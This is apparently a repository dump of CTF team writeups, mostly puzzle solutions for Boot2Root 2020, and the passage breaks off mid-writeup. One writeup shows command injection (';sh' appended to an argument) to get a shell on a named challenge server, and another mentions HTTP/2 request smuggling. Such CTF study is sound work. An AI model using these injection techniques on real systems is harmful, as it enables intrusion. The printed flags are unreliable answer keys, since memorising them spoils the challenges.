├── 2020
├── Boot2root_ctf
│ ├── Active directory
│ │ ├── README.md
│ │ └── gpp.zip
│ ├── Buggy PHP
│ │ └── README.md
│ ├── Count the door
│ │ └── README.md
│ ├── Immortal
│ │ ├── README.md
│ │ ├── chess.png
│ │ ├── moves
│ │ └── wiki.png
│ ├── Open gl
│ │ ├── README.md
│ │ ├── base64.png
│ │ ├── cyberchef.png
│ │ └── sample
│ ├── README.md
│ ├── Roppy ropper
│ │ └── README.md
│ ├── Smuggle
│ │ └── README.md
│ ├── Staple
│ │ ├── README.md
│ │ ├── crackme
│ │ └── strings.png
│ ├── Target 1
│ │ ├── README.md
│ │ ├── bot.png
│ │ ├── comment.png
│ │ ├── decode.png
│ │ ├── flag.png
│ │ └── morse.wav
│ ├── Target 3
│ │ └── README.md
│ ├── Try try but don't cry
│ │ ├── README.md
│ │ ├── chall.py
│ │ ├── chall.txt
│ │ └── cyberchef.png
│ ├── Upload
│ │ ├── README.md
│ │ ├── Ryn0.png
│ │ ├── flag.txt
│ │ └── htaccess
│ ├── Welcome To Pwn
│ │ └── README.md
│ ├── boot2root.png
│ └── rasput1n's string
│ │ ├── README.md
│ │ ├── file
│ │ └── getflag.py
├── InterIUT_ctf
│ ├── La voie du SAGE
│ │ ├── README.md
│ │ ├── Sage_Part_1_1.png
│ │ └── Sage_Part_1_2.png
│ ├── Le SAGE doré
│ │ ├── README.md
│ │ ├── Sage_Part_0_1.png
│ │ └── Sage_Part_0_2.png
│ ├── README.md
│ ├── cature_the_flag
│ │ ├── README.md
│ │ ├── chall.png
│ │ ├── cyberchef.png
│ │ └── website.png
│ ├── data_recovery_1
│ │ ├── README.md
│ │ ├── linkedin.png
│ │ └── skrapp.png
│ ├── graph.png
│ ├── ping_pong
│ │ ├── README.md
│ │ └── ping_pong.pcapng
│ ├── rank.png
│ ├── we_will_rock_you
│ │ ├── README.md
│ │ ├── hash
│ │ └── hash-types.png
│ └── we_will_rock_you_again
│ │ ├── README.md
│ │ ├── hash-identifier.png
│ │ ├── hashcatss.png
│ │ ├── help.png
│ │ └── show.png
├── affinity_ctf_lite
│ ├── Aether plane take off
│ │ ├── README.md
│ │ ├── aether_plane_take_off.wav
│ │ └── figidi-result.png
│ ├── Astatine
│ │ ├── Base85CyberChef.png
│ │ └── README.md
│ ├── Black Dots
│ │ ├── README.md
│ │ ├── Script2.png
│ │ └── mg.png
│ ├── BreakMe
│ │ ├── README.md
│ │ ├── encrypted.txt
│ │ └── public.pem
│ ├── Catch_me_if_you_can
│ │ ├── README.md
│ │ └── images
│ │ │ ├── img.png
│ │ │ ├── long-polls.png
│ │ │ └── pwn.gif
│ ├── Char_Wrap
│ │ ├── README.md
│ │ ├── charwrap
│ │ ├── charwrap.png
│ │ ├── file.png
│ │ └── stringsuse.png
│ ├── Classic_Forensics
│ │ ├── README.md
│ │ ├── description.png
│ │ ├── fileinfo.png
│ │ └── volatility.png
│ ├── Fibonacci
│ │ ├── Fibonacci
│ │ ├── Fibonacci.7z
│ │ ├── README.md
│ │ ├── main.py
│ │ └── out.7z
│ ├── Hongqiao
│ │ ├── README.md
│ │ └── crackstation.png
│ ├── I need bass
│ │ ├── README.md
│ │ ├── b58CyberChef.png
│ │ └── site.png
│ ├── Lost_Head
│ │ ├── README.md
│ │ ├── description.png
│ │ ├── lostHead.pcapng
│ │ └── wiresharkscreenshot.png
│ ├── Magic Word
│ │ ├── README.md
│ │ ├── flag_printed.png
│ │ ├── jmp.png
│ │ ├── magicword
│ │ ├── magicword.png
│ │ └── nops.png
│ ├── Malicious File
│ │ ├── README.md
│ │ ├── base64.png
│ │ ├── community.png
│ │ ├── malware
│ │ └── virustotal.png
│ ├── NotRandomCMS
│ │ ├── CMS.7z
│ │ └── README.md
│ ├── One is missing
│ │ ├── README.md
│ │ ├── full_of__cuteness.jpg
│ │ └── strings.png
│ ├── Path of Double-Dipping
│ │ ├── README.md
│ │ ├── flag.png
│ │ ├── ndc.png
│ │ └── urltwice.png
│ ├── Path_of_the_suspect
│ │ ├── Figure_1.png
│ │ ├── README.md
│ │ ├── archive
│ │ │ ├── Figure_1.png
│ │ │ ├── gpsvis
│ │ │ ├── locs.json
│ │ │ ├── locs1.json
│ │ │ ├── locs_b.json
│ │ │ ├── main.py
│ │ │ ├── main1.py
│ │ │ ├── manual_locs.txt
│ │ │ ├── mapcust.txt
│ │ │ ├── notes.md
│ │ │ ├── notes.txt
│ │ │ ├── parse.py
│ │ │ ├── proc.py
│ │ │ ├── proc1.py
│ │ │ ├── proc2.py
│ │ │ ├── proc3.py
│ │ │ ├── src.json
│ │ │ └── src.txt
│ │ ├── locs.json
│ │ ├── main.py
│ │ ├── map.png
│ │ ├── mapconv
│ │ ├── parse.py
│ │ ├── proc.py
│ │ ├── src.json
│ │ ├── src.txt
│ │ └── suspect_BTS_registration_log.pdf
│ ├── README.md
│ ├── Shark has a long tail
│ │ ├── CyberChef.png
│ │ ├── README.md
│ │ ├── SharkHasALongTail.pcap
│ │ ├── tcp_lengths.txt
│ │ └── wire_shark.png
│ ├── Wholeisbetter
│ │ ├── README.md
│ │ └── There_is_a_flag_somewhere.pdf
│ ├── collision_course
│ │ ├── README.md
│ │ ├── collision1.zip
│ │ └── collision2.zip
│ ├── dias skeerG tneicna
│ │ ├── README.md
│ │ └── decode.me
│ ├── operationsluggishhamster
│ │ ├── README.md
│ │ ├── flag.png
│ │ ├── ostrichflag.png
│ │ ├── pubkey.png
│ │ ├── sherlock.png
│ │ ├── wayback.png
│ │ └── wp1.png
│ ├── pseudo-pseudo-random
│ │ └── README.md
│ ├── rank.png
│ ├── sooodefault
│ │ ├── README.md
│ │ └── script.png
│ └── true-content
│ │ ├── README.md
│ │ └── images
│ │ ├── before-redirect.png
│ │ ├── construction.png
│ │ └── solve.png
├── asis_ctf
│ ├── Dream
│ │ └── README.md
│ ├── Izzy
│ │ └── README.md
│ ├── Less secure secrets
│ │ └── README.md
│ ├── README.md
│ └── asis.png
├── dragon_ctf
│ └── README.md
├── sunshine_ctf
│ ├── README.md
│ ├── hotel
│ │ ├── .gdb_history
│ │ ├── README.md
│ │ ├── a.out
│ │ ├── decomp.c
│ │ ├── decomp1.c
│ │ ├── hotel_key_puzzle
│ │ ├── key.txt
│ │ ├── main.py
│ │ ├── notes.md
│ │ ├── scrap.py
│ │ └── test.c
│ ├── pegasus
│ │ ├── EAR_EAR.md
│ │ ├── LicenseChecker.peg
│ │ ├── PEGASUS.md
│ │ ├── PEGASUS_User_Guide.peg
│ │ ├── bof.peg
│ │ ├── core.sh.25065
│ │ ├── dump
│ │ ├── dump1
│ │ ├── flag.txt
│ │ ├── libpegasus_ear.so
│ │ ├── license_check
│ │ │ └── README.md
│ │ ├── main.py
│ │ ├── main1.py
│ │ ├── notes.md
│ │ ├── payload
│ │ ├── peg_brute_checker.so
│ │ ├── peg_dev_checker.so
│ │ ├── peg_pwn_checker.so
│ │ ├── peg_rev_checker.so
│ │ ├── runpeg
│ │ ├── scramble.py
│ │ ├── scramble1.py
│ │ ├── scratch.md
│ │ ├── shit
│ │ └── submitpeg
│ ├── rank.png
│ └── speedrun
│ │ ├── 0
│ │ ├── .gdb_history
│ │ ├── chall_00
│ │ ├── main.py
│ │ └── payload
│ │ ├── 1
│ │ ├── .gdb_history
│ │ ├── chall_01
│ │ ├── main.py
│ │ └── payload
│ │ ├── 2
│ │ ├── .gdb_history
│ │ ├── a.out
│ │ ├── chall_02
│ │ ├── core
│ │ ├── main.py
│ │ ├── notes.md
│ │ ├── payload
│ │ └── test.c
│ │ ├── 3
│ │ ├── .gdb_history
│ │ ├── chall_03
│ │ ├── core
│ │ ├── main.py
│ │ └── payload
│ │ ├── 4
│ │ ├── .gdb_history
│ │ ├── chall_04
│ │ ├── core
│ │ ├── main.py
│ │ ├── notes.md
│ │ └── payload
│ │ ├── 5
│ │ ├── .gdb_history
│ │ ├── chall_05
│ │ ├── core
│ │ └── main.py
│ │ ├── 6
│ │ ├── .gdb_history
│ │ ├── chall_06
│ │ ├── core
│ │ ├── main.py
│ │ └── notes.md
│ │ ├── 7
│ │ ├── .gdb_history
│ │ ├── chall_07
│ │ ├── core
│ │ ├── main.py
│ │ └── notes.md
│ │ ├── 8
│ │ ├── .gdb_history
│ │ ├── chall_08
│ │ ├── main.py
│ │ └── notes.md
│ │ ├── 9
│ │ ├── .gdb_history
│ │ ├── chall_09
│ │ ├── main.py
│ │ ├── notes.md
│ │ └── payload
│ │ ├── 10
│ │ ├── .gdb_history
│ │ ├── chall_10
│ │ ├── main.py
│ │ ├── notes.md
│ │ └── payload
│ │ ├── 11
│ │ ├── .gdb_history
│ │ ├── chall_11
│ │ ├── core
│ │ ├── main.py
│ │ ├── notes.md
│ │ └── payload
│ │ ├── 12
│ │ ├── .gdb_history
│ │ ├── chall_12
│ │ ├── main.py
│ │ └── payload
│ │ ├── 13
│ │ ├── .gdb_history
│ │ ├── chall_13
│ │ ├── core
│ │ ├── main.py
│ │ ├── notes.md
│ │ └── payload
│ │ ├── 14
│ │ ├── .gdb_history
│ │ ├── README.md
│ │ ├── chall_14
│ │ ├── core
│ │ ├── main.py
│ │ ├── main_srop.py
│ │ ├── notes.md
│ │ ├── payload
│ │ ├── rop.txt
│ │ └── scrap.py
│ │ ├── 15
│ │ ├── .gdb_history
│ │ ├── chall_15
│ │ ├── core
│ │ ├── flag.txt
│ │ ├── main.py
│ │ ├── notes.md
│ │ └── payload
│ │ ├── 16
│ │ ├── .gdb_history
│ │ ├── chall_16
│ │ ├── main.py
│ │ ├── notes.md
│ │ └── payload
│ │ ├── 17
│ │ ├── .gdb_history
│ │ ├── a.out
│ │ ├── chall_17
│ │ ├── main.py
│ │ └── test.c
│ │ └── README.md
└── vulnfreak_ctf
│ ├── 4li3n W4nt H3lp
│ ├── README.md
│ └── chall.PNG
│ ├── Anonymous
│ ├── README.md
│ ├── spectogram.png
│ └── video.mp4
│ ├── Base Fun
│ ├── README.md
│ ├── chall.txt
│ └── screenshot.png
│ ├── Binary or Not
│ └── README.md
│ ├── Class Bunk Case
│ ├── FLAG.png
│ └── README.md
│ ├── Do It Man
│ ├── 1.jpg
│ ├── 2.jpg
│ ├── 3.jpg
│ ├── 4.jpg
│ ├── README.md
│ └── chall.apk
│ ├── Fort Mystery
│ ├── README.md
│ └── decodefr.png
│ ├── Mega Sale
│ ├── README.md
│ ├── flag.jpg
│ ├── life_efil.txt
│ └── screenshot.png
│ ├── Mr Robot
│ ├── README.md
│ ├── foremost.png
│ ├── mrrobot.jpg
│ └── robot1.jpg
│ ├── New Encryption
│ ├── README.md
│ └── Script.py
│ ├── Next Target
│ ├── README.md
│ └── assets
│ │ ├── chall.png
│ │ └── next-target.PNG
│ ├── Note on desk
│ ├── README.md
│ ├── notes.zip
│ └── out.jpg
│ ├── Programming Fight
│ └── README.md
│ ├── README.md
│ ├── logo.png
│ └── rank.png
├── 2021
├── README.md
└── cybergrab_ctf
│ ├── Easy!!!
│ ├── README.md
│ ├── cyberchef.png
│ ├── file.txt
│ ├── flag.txt
│ ├── index.jpeg
│ ├── rot13.png
│ └── steghide.png
│ ├── Jasper
│ ├── Jasper.jpg
│ └── readme.md
│ ├── README.md
│ ├── Wonderful Colours
│ ├── README.md
│ ├── colorcode.png
│ └── colourful.png
│ ├── everyone intrested in my secret life ( ᴗ )
│ ├── README.md
│ ├── base64.png
│ └── jwt_tool.png
│ ├── follow
│ └── readme.md
│ └── scoreboard.png
├── 2022
├── CybergrabsCTF
│ ├── README.md
│ └── screenshot.png
├── DefCampCTF
│ ├── README.md
│ └── scoreboard.png
├── HayyimCTF
│ ├── README.md
│ └── scoreboard.png
├── KnightCTF
│ ├── Digital Forensics
│ │ ├── Digital Forensics.png
│ │ ├── README.md
│ │ ├── The Lost Flag
│ │ │ ├── Lost Flag .png
│ │ │ ├── README.md
│ │ │ ├── flag.txt
│ │ │ ├── que.png
│ │ │ ├── sol.png
│ │ │ └── sol.txt
│ │ └── Unknown File
│ │ │ ├── README.md
│ │ │ ├── flag.txt
│ │ │ ├── que.png
│ │ │ ├── unknown file
│ │ │ └── unknown file.zip
│ ├── Misc
│ │ ├── Look Closely
│ │ │ ├── 1.png
│ │ │ ├── 2.png
│ │ │ ├── README.md
│ │ │ ├── flag.txt
│ │ │ ├── look closely.wav
│ │ │ ├── que.png
│ │ │ └── settings.png
│ │ ├── Misc.png
│ │ ├── README.md
│ │ └── The Hungry Dragon
│ │ │ ├── README.md
│ │ │ ├── The Hungry Dragon.3mf
│ │ │ ├── dragon.png
│ │ │ ├── hideDragon.png
│ │ │ ├── insideDragon.png
│ │ │ └── que.png
│ ├── OSINT
│ │ ├── Canada
│ │ │ ├── 1.png
│ │ │ ├── 1que.png
│ │ │ ├── 2.png
│ │ │ ├── README.md
│ │ │ └── flag.txt
│ │ ├── Explosion In Front Of Bank Of Spain
│ │ │ ├── 1.png
│ │ │ ├── Explosion_In_Front_Of_Bank_Of_Spain.png
│ │ │ ├── README.md
│ │ │ ├── flag.txt
│ │ │ └── que.png
│ │ ├── Find The Camera
│ │ │ ├── 1.png
│ │ │ ├── Bus.png
│ │ │ ├── README.md
│ │ │ └── que.png
│ │ ├── OSINT.png
│ │ └── README.md
│ ├── Programming
│ │ ├── Find The Number
│ │ │ ├── flag.txt
│ │ │ └── sol.py
│ │ ├── Keep Calculating
│ │ │ ├── flag.txt
│ │ │ └── sol.py
│ │ ├── Programming.png
│ │ ├── README.md
│ │ ├── Reverse The Answer
│ │ │ ├── flag.txt
│ │ │ └── sol.py
│ │ ├── Something In Common
│ │ │ ├── flag.txt
│ │ │ └── sol.py
│ │ └── Squre Sum
│ │ │ ├── sol.py
│ │ │ └── sol.txt
│ ├── README.md
│ ├── Steganography
│ │ ├── FileD
│ │ │ ├── 1.png
│ │ │ ├── 2.png
│ │ │ ├── README.md
│ │ │ ├── filed.kra
│ │ │ ├── flag.txt
│ │ │ └── que.png
│ │ ├── Follow The White Rabbit
│ │ │ ├── 1.png
│ │ │ ├── README.md
│ │ │ ├── flag.txt
│ │ │ ├── que.png
│ │ │ └── whiterabbit.jpg
│ │ ├── Follow
│ │ │ ├── 1.png
│ │ │ ├── Follow.pdf
│ │ │ ├── README.md
│ │ │ ├── flag.txt
│ │ │ └── que.png
│ │ ├── QR Code From The Future
│ │ │ ├── QR_Code_From_The_Future.gif
│ │ │ ├── README.md
│ │ │ ├── flag.txt
│ │ │ ├── img
│ │ │ │ ├── 0.png
│ │ │ │ ├── 1.png
│ │ │ │ ├── 2.png
│ │ │ │ ├── 3.png
│ │ │ │ ├── 4.png
│ │ │ │ ├── 5.png
│ │ │ │ ├── 6.png
│ │ │ │ ├── 7.png
│ │ │ │ ├── 8.png
│ │ │ │ ├── 9.png
│ │ │ │ ├── 10.png
│ │ │ │ ├── 11.png
│ │ │ │ ├── 12.png
│ │ │ │ ├── 13.png
│ │ │ │ ├── 14.png
│ │ │ │ ├── 15.png
│ │ │ │ ├── 16.png
│ │ │ │ ├── 17.png
│ │ │ │ ├── 18.png
│ │ │ │ ├── 19.png
│ │ │ │ ├── 20.png
│ │ │ │ ├── 21.png
│ │ │ │ ├── 22.png
│ │ │ │ ├── 23.png
│ │ │ │ ├── 24.png
│ │ │ │ ├── 25.png
│ │ │ │ ├── 26.png
│ │ │ │ ├── 27.png
│ │ │ │ ├── 28.png
│ │ │ │ ├── 29.png
│ │ │ │ ├── 30.png
│ │ │ │ ├── 31.png
│ │ │ │ ├── 32.png
│ │ │ │ ├── 33.png
│ │ │ │ ├── 34.png
│ │ │ │ ├── 35.png
│ │ │ │ ├── 36.png
│ │ │ │ ├── 37.png
│ │ │ │ ├── 38.png
│ │ │ │ ├── 39.png
│ │ │ │ ├── 40.png
│ │ │ │ ├── 41.png
│ │ │ │ ├── 42.png
│ │ │ │ ├── 43.png
│ │ │ │ ├── 44.png
│ │ │ │ ├── 45.png
│ │ │ │ ├── 46.png
│ │ │ │ └── 47.png
│ │ │ └── que.png
│ │ ├── README.md
│ │ └── Steganography.png
│ └── scoreboard2.png
└── SquidCTF
│ ├── Forensics
│ ├── Forensics.png
│ ├── Is it or it isn’t [134]
│ │ ├── README.md
│ │ ├── flag.txt
│ │ ├── que.png
│ │ ├── sol.sh
│ │ └── status.txt
│ ├── It will take too long [104]
│ │ ├── README.md
│ │ ├── Zipped99.zip
│ │ ├── flag.txt
│ │ ├── que.png
│ │ └── sol.sh
│ ├── Player 001 [30]
│ │ ├── README.md
│ │ ├── confidential.mp3
│ │ ├── confidential_(rev).mp3
│ │ ├── flag.txt
│ │ └── que.png
│ └── README.md
│ ├── OSINT
│ ├── Anonymous Call [140]
│ │ ├── README.md
│ │ ├── dec-to-ascii.png
│ │ ├── flag.txt
│ │ ├── hello.wav
│ │ └── que.png
│ ├── Belarus [20]
│ │ ├── README.md
│ │ ├── flag.txt
│ │ ├── image.png
│ │ ├── image_good_quality.png
│ │ ├── image_map.png
│ │ ├── image_station.png
│ │ ├── image_zoom.png
│ │ └── que.png
│ ├── OSINT.png
│ └── README.md
│ ├── README.md
│ └── scoreboard.png
├── .gitignore
└── README.md
/.gitignore:
--------------------------------------------------------------------------------
1 | **/.DS_Store
2 | .DS_Store
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Active directory/gpp.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Active directory/gpp.zip
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Count the door/README.md:
--------------------------------------------------------------------------------
1 | # Count the doors
2 | **category: programming**
3 | **points: 440**
4 |
5 | ## Description
6 | N = 898399329838283293892392328398239832
7 |
8 | There are N doors, all closed. In a nearby cage are N apes.
9 |
10 | The first ape is let out, and runs along the doors opening every one. The second ape is then let out, and runs along the doors closing the 2nd, 4th, 6th,… - all the even-numbered doors. The third ape is let out. He attends only to the 3rd, 6th, 9th,… doors (every third door, in other words), closing any that is open and opening any that is closed, and so on. After all N apes have done their work in this way, how many doors are still open.
11 |
12 | Enclose the number in b00t2root{}
13 |
14 | ## Solution
15 | This problem is like the [100 doors challenge](https://rosettacode.org/wiki/100_doors) but with a really large integer. The solution is to count the number of perfect squares up to N as noted [here](https://rosettacode.org/wiki/Talk:100_doors). To get the number of perfect squares, we just have to get the square root of N. We can use this [website](https://www.calculator.net/big-number-calculator.html) to do calculations on big numbers.
16 |
17 | **FLAG:** `b00t2root{947839295365139044}`
18 |
19 |
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Immortal/README.md:
--------------------------------------------------------------------------------
1 | # Immortal
2 |
3 | **Category**: Programming \
4 | **Points**: 479
5 |
6 | ## Discription
7 |
8 | > How many pawns are left on the board after the game is completed?
9 | a = number of black pawns left
10 | b = number of white pawns left
11 | Submit the answer as: b00t2root{a,b}
12 |
13 | ## Solution
14 |
15 | We were given [moves](moves) file. Looking into the file, i don't understand what type of data is it. Searching on google gave us this page [Pirc_Defence](https://en.wikipedia.org/wiki/Pirc_Defence). So these are `chess` moves
16 |
17 | Scrolling the page gave us `Example Games`. One game moves are same as given in the [moves](moves) file.
18 |
19 | 
20 |
21 | So i searched for that particular game on google and got a great [website](https://www.chess.com/blog/SamCopeland/the-greatest-chess-game-of-all-time-explained-kasparov-vs-topalov-1999) that show the whole game in Graphical Format
22 |
23 | we need to know the number of white and black pawns left in last
24 |
25 | 
26 |
27 | FLAG : b00t2root{4,3}
28 |
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Immortal/chess.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Immortal/chess.png
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Immortal/moves:
--------------------------------------------------------------------------------
1 | 1.e4 d6
2 | 2.d4 Nf6
3 | 3.Nc3 g6
4 | 4.Be3 Bg7
5 | 5.Qd2 c6
6 | 6.f3 b5
7 | 7.Nge2 Nbd7
8 | 8.Bh6 Bxh6
9 | 9.Qxh6 Bb7
10 | 10.a3 e5
11 | 11.O-O-O Qe7
12 | 12.Kb1 a6
13 | 13.Nc1 O-O-O
14 | 14.Nb3 exd4
15 | 15.Rxd4 c5
16 | 16.Rd1 Nb6
17 | 17.g3 Kb8
18 | 18.Na5 Ba8
19 | 19.Bh3 d5
20 | 20.Qf4+ Ka7
21 | 21.Rhe1 d4
22 | 22.Nd5 Nbxd5
23 | 23.exd5 Qd6
24 | 24.Rxd4 cxd4
25 | 25.Re7+ Kb6
26 | 26.Qxd4+ Kxa5
27 | 27.b4+ Ka4
28 | 28.Qc3 Qxd5
29 | 29.Ra7 Bb7
30 | 30.Rxb7 Qc4
31 | 31.Qxf6 Kxa3
32 | 32.Qxa6+ Kxb4
33 | 33.c3+ Kxc3
34 | 34.Qa1+ Kd2
35 | 35.Qb2+ Kd1
36 | 36.Bf1 Rd2
37 | 37.Rd7 Rxd7
38 | 38.Bxc4 bxc4
39 | 39.Qxh8 Rd3
40 | 40.Qa8 c3
41 | 41.Qa4+ Ke1
42 | 42.f4 f5
43 | 43.Kc1 Rd2
44 | 44.Qa7
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Immortal/wiki.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Immortal/wiki.png
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Open gl/README.md:
--------------------------------------------------------------------------------
1 | # Open gl
2 |
3 | **Category**: Reverse Enginnering \
4 | **Points**: 490
5 |
6 | ## Solution
7 |
8 | We are given a [binary](sample). As always, i ran strings on it. Looking to the output we have some strings
9 |
10 | 
11 |
12 | decoding them from `cyberchef` leaks most of the flag
13 |
14 | 
15 |
16 | looking at the flag it was obvious the last word is `great`
17 |
18 | Flag : `b00t2root{opengl_programs_are_great}`
19 |
20 | (This was not the intended solution of this challenge but authors forgot about strings)
21 |
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Open gl/base64.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Open gl/base64.png
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Open gl/cyberchef.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Open gl/cyberchef.png
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Open gl/sample:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Open gl/sample
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/README.md:
--------------------------------------------------------------------------------
1 | # Boot2Root CTF 2020
2 |
3 | **Site** : https://boot2root.team
4 |
5 | **Rank** : 9/124
6 |
7 | 
8 |
9 |
10 |
11 |
12 |
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Roppy ropper/README.md:
--------------------------------------------------------------------------------
1 | # Roppy ropper
2 | **category: pwn**
3 | **points: 467**
4 |
5 | ## Description
6 | I love ropes do you?
7 | nc 35.238.225.156 1004
8 |
9 | ## Solution
10 | After running netcat, this prompt showed up.
11 | ```
12 | $ nc 35.238.225.156 1004
13 | (list_me_like_crazy)
14 | Is this lsass I dont understand :)
15 | Give me your arguments:
16 | ```
17 | I tried several inputs and got this:
18 | ```
19 | (list_me_like_crazy)
20 | Is this lsass I dont understand :)
21 | Give me your arguments:
22 | .
23 | Result: ls .:
24 | flag.txt
25 | lsass
26 | ```
27 | It looks like this program runs `ls` with input from us. Then I tried using a new bash statement to cat the flag.txt file.
28 | ```
29 | Is this lsass I dont understand :)
30 | Give me your arguments:
31 | .; cat flag.txt
32 | Result: ls .; :
33 | flag.txt
34 | lsass
35 | ```
36 | It didn't work. Looks like only 3 characters is acceptable as input. Then I tried getting a reverse shell with `sh`.
37 | ```
38 | (list_me_like_crazy)
39 | Is this lsass I dont understand :)
40 | Give me your arguments:
41 | ;sh
42 | Result: ls ;sh:
43 | flag.txt
44 | lsass
45 | cat flag.txt
46 | b00t2root{R0p_cHa1nS_ar3_tH3_b3st}
47 | ```
48 | It worked!
49 |
50 | **FLAG:** `b00t2root{R0p_cHa1nS_ar3_tH3_b3st}`
51 |
52 |
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Smuggle/README.md:
--------------------------------------------------------------------------------
1 | # **Smuggle**(web)
2 |
3 | [challenge url](https://192.34.57.73:8001/)
4 | 
5 |
6 | when i go to https://192.34.57.73:8001/flag i got **400 status code**
7 | than i concluded that it needs to use as this as tunnel to make request to backend server.
8 |
9 | by using this script : https://github.com/BishopFox/h2csmuggler (thanks to author)
10 | 
11 |
12 | # flag : b00t2root{so_you_know_how_to_smuggle}
13 |
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Staple/README.md:
--------------------------------------------------------------------------------
1 | # Staple
2 |
3 | **Category**: Reverse Enginnering \
4 | **Points**: 481
5 |
6 | ## Discription
7 |
8 | > Whats the secret code Note:-Enclose secret code in b00t2root{}
9 |
10 | ## Solution
11 |
12 | So we are given [crackme](crackme) to reverse and get the secret code. First thing i do is, check out the strings
13 |
14 | 
15 |
16 | FLAG : `b002root{62f6sHpFshNh844rTh}`
17 |
18 | (This was not the intended solution of this challenge but authors forgot about strings)
19 |
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Staple/crackme:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Staple/crackme
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Staple/strings.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Staple/strings.png
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Target 1/README.md:
--------------------------------------------------------------------------------
1 | # Target 1
2 |
3 | **Category**: OSINT \
4 | **Points**: 100
5 |
6 | ## Discription
7 |
8 | > There is a secret agent deep in enemy territory relaying critical information through clues spread all over the web. Your job, as a hacker at the NSA, is to find the clues about his targets and get the final information which is in the form of flags.
9 | To aid you on this journey, we have found a discord bot (check the main server) which gives you the appropriate flag on sending the name of the next target (All caps with no spaces). If you are stuck, don't hesitate to contact the mastermind of this operation, @rasput1n#8331 on the main server.
10 | The next challenges are continuation of this challenge.
11 | For the first clue, send a message "^info" (without quotes) to the discord bot.
12 | Note: To send messages to the bot, you need to use ^ before every command.
13 |
14 | ## Solution
15 |
16 | As said in discription i messaged the bot `^info`
17 |
18 | 
19 |
20 | So we got a instagram username `redjohn190989`. Looking into that account, in 2nd post one comment catch my eyes
21 |
22 | 
23 |
24 | Going to the url we have a [wav file](morse.wav). It was `Morse Code`
25 |
26 | 
27 |
28 | Decoding it online give us a string. Passing it to bot give us the flag
29 |
30 | 
31 |
32 | FLAG : `b00t2root{m0rs3_d3cod3r_i5_fun}`
33 |
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Target 1/bot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Target 1/bot.png
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Target 1/comment.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Target 1/comment.png
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Target 1/decode.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Target 1/decode.png
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Target 1/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Target 1/flag.png
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Target 1/morse.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Target 1/morse.wav
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Try try but don't cry/README.md:
--------------------------------------------------------------------------------
1 | # Try try but don't cry
2 | **category: cryptography**
3 | **points: 449**
4 |
5 | ## Description
6 | So many b64 and hex encodings.
7 | We are given a [cipher text](./chall.txt) and the [python script](./chall.py) used to make it.
8 |
9 | ## Solution
10 | After reading the script, it looks like the flag is split into halves, then the characters from each half is xored with each other.
11 | Then it is encoded in hex, and the loop at the end randomnly encodes the flag with hex and base64. I used [Cyberchef](https://gchq.github.io/CyberChef/) to manually decode until I reach the last hex-encoded string.
12 |
13 | 
14 |
15 | Since we know the flag is in b00t2root{.\*} format, we can manually decode the xor. The original flag is split into 2 parts:
16 | - b00t2root{_
17 | - __________}
18 | And the output is 035e44154106060c17181b.
19 |
20 | We can xor the known characters with the hex string, and get the rest of the flag.
21 | - 'b' ^ 03 = 'a'
22 | - '0' ^ 5e = 'n'
23 | - '0' ^ 44 = 't'
24 | - 't' ^ 15 = 'a'
25 | - '2' ^ 41 = 's'
